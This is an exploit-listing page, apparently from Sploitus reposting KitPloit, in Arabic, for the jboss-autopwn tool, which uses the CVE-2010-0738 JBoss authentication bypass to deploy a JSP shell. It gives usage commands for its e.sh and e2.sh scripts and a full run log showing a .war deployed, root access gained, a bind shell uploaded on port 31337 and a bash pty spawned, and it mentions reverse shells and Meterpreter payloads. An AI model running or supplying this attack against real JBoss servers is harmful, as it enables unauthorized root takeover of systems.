Sploitus

Exploit for jboss-autopwn

kitploit · 2026-08-25

Exploit Code

MARKDOWN76 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GITCOLLECT-JBOSS-AUTOPWN
# jboss-autopwn

JBoss Autopwn كما تم عرضه في BlackHat Europe 2010 - هذه النسخة تتضمن CVE-2010-0738، ثغرة تجاوز المصادقة في JBoss عبر التلاعب بـ VERB والتي اكتشفتها Minded Security

C. Papathanasiou 2010

# المقدمة

يقوم هذا السكريبت الخاص بـ JBoss بنشر واجهة JSP على الخادم المستهدف. بمجرد النشر، يستخدم السكريبت إمكانات التحميل وتنفيذ الأوامر لتوفير جلسة تفاعلية.

الميزات تتضمن:

  * دعم متعدد المنصات - تم اختباره على أهداف ويندوز ولينكس وماك
  * دعم لصدفة ملزمة وصدفة عكسية
  * دعم لصفحات Meterpreter و VNC لأهداف ويندوز



# التنصيب

الاعتماديات تشمل:

  * Netcat
  * Curl
  * Metasploit v3، مثبت في المسار الحالي باسم "framework3"



# الاستخدام

استخدم e.sh لأهداف *nix التي تستخدم bind_tcp و reverse_tcp

root@kitploit:~
    
    
    ./e.sh target_ip tcp_port
    

استخدم e2.sh لأهداف ويندوز التي يمكنها تنفيذ حمولات Metasploit لويندوز

root@kitploit:~
    
    
    /e2.sh target_ip tcp_port
    

# أمثلة

صدفة لينكس ملزمة:

root@kitploit:~
    
    
    [root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
    [x] Retrieving cookie
    [x] Now creating BSH script...
    [x] .war file created successfully in /tmp
    [x] Now deploying .war file:
    http://192.168.1.2:8080/browser/browser/browser.jsp
    [x] Running as user...:
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    [x] Server uname...:
     Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
    [!] Would you like to upload a reverse or a bind shell? bind
    [!] On which port would you like the bindshell to listen on? 31337
    [x] Uploading bind shell payload..
    [x] Verifying if upload was successful...
    -rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload
    [x] You should have a bind shell on 192.168.1.2:31337..
    [x] Dropping you into a shell...
    Connection to 192.168.1.2 31337 port [tcp/*] succeeded!
    id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    python -c 'import pty; pty.spawn("/bin/bash")'
    [root@nitrogen /]# full interactive shell :-)